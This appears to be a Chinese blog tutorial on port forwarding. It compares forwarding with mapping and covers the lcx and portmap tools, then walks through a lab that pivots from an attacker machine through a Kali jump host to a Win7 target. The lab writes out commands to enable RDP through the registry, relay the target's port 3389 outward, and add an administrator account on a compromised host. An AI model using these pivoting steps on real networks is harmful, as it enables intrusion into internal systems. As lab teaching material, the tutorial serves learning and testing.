端口转发
端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。
比如,我们现在在内网中,是没有办法直接访问外网的。但是我们可以通过路由器的NAT方式访问外网。假如我们内网现在有100台主机,那么我们现在都是通过路由器的这一个公网IP和外网通信的。那么,当互联网上的消息发送回来时,路由器是怎么知道这个消息是给他的,而另外消息是给你的呢?这就要我们的ip地址和路由器的端口进行绑定了,这时,在路由器中就会有一个内网ip和路由器端口对应的一张表。当路由器的10000端口收到消息时,就知道把消息发送给他,而当20000端口收到消息时,就知道把消息发送给你。这就是端口转发,其转发一个端口收到的流量,给另一个主机。
简单解释端口转发:
你给我了,我打开看看,发现这上面标志显示是要给张三,那么我就给张三去。如果标志是给李四,那我就再给李四去。
端口转发与端口映射的区别
转发的重点在“转”上面。送快递的过来,把所有快递都交给门口保安,保安再根据每件快递上的收件人来分发。映射,就是在大门口给每个人装个柜子,送快递的直接按收件人名字,把快递放到对应的柜子里面。
工具介绍
windows版lcx.exe,linunx版为portmap
对于不同的环境下可通过两者工具之间配合利用
lcx
经典的端口转发工具,基于Socket套接字的端口转发工具
Lcx有两大功能,一个是端口转发(listen和slave成对使用),另一个是端口映射(tran)
端口转发:
Lcx -Listen <监听slave请求的端口(对应slave 的第二个参数)> <等待连接的端口>
Lcx -slave <你的ip> <监听端口(对应listen的第一个参数)> <目标ip> <目标端口>
端口映射:
Lcx -tran <等待连接的端口> <目标ip> <目标端口>
如何使用请跳转至 lcx作端口映射
portmap
从图中可以看到一些参数应该都好理解。
这里有一个-m参数的解释:以以下哪种方式来用这个工具
然后下面有三个方式:
1.监听port1 端口并且连接主机2的port2 端口
2.监听port1和port2 端口
3.连接主机1对应的端口和主机2对应的端口
实验利用
- 攻击机:ubuntu —— 192.168.101.128
- 跳板机:kali2020 —— 192.168.101.129 ,10.10.10.130
- 靶 机:win7 —— 10.10.10.128
Win7靶机
首先在靶机先开启rdp端口
开启3389:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查看远程终端:
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
(0xd3d 3389)
使用lcx工具及slave参数,命令表示,将靶机127.0.0.1或10.10.10.128的3389端口的所有数据转发到10.10.10.130(跳板机)
lcx.exe -slave 10.10.10.130 4444 127.0.0.1 3389
下图是靶机下工具正常使用的情况
Kali跳板机
使用portmap工具以第二种方式,因为不能用一个端口做两件事,所以需要监听本地4444端口,将其转发至跳板机即本地机器192.168.101.129的7777端口
./portmap -m 2 -p1 4444 -h2 192.168.101.129 -p2 7777
Ubuntu攻击机
使用ubuntu自带的remmina远程连接工具,尝试连接跳板机的7777端口,将访问到win7靶机的3389端口服务
尝试远程连接是没问题的
原因是当前win7用户使用中(可通过切换到别的用户登录再远程当前用户试试)
尝试新建一个用户并纳入管理员组
连接新用户,可以看到正常使用
总结
当内网目标机器权限被拿下,外网机器又没办法直接连接内网机器服务,我们就可以将内网机器的服务端口转发到拥有内外网卡的机器即跳板机端口上,然后外网机器就可以访问内外网机器的转发端口即可访问到内网指定的服务。
参考链接:
https://xie1997.blog.csdn.net/article/details/84539150
GOT IT!
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~
1455
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
